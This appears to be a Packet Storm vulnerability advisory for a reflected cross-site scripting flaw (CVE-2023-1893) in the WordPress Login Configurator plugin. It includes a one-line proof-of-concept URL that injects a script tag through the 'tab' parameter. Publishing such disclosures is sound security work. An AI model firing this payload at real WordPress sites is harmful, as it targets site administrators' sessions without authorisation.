WordPress Login Configurator plugin version 2.1 and below suffer from a cross site scripting vulnerability.
e5e253464a546f3e0cfcdbce34ae6cc91a22cf463dad24650461e839cfe11b27Tittle:
WordPress Plugin Login Configurator <= 2.1 - Reflected Cross-Site Scripting
References:
CVE-2023-1893
Author:
Taurus Omar
Description:
The plugin does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.
Affects Plugins:
Login Configurator - No known fix - plugin closed
Proof of Concept:
Visit the following path:
/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top
Classification:
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79
wpScan:
https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed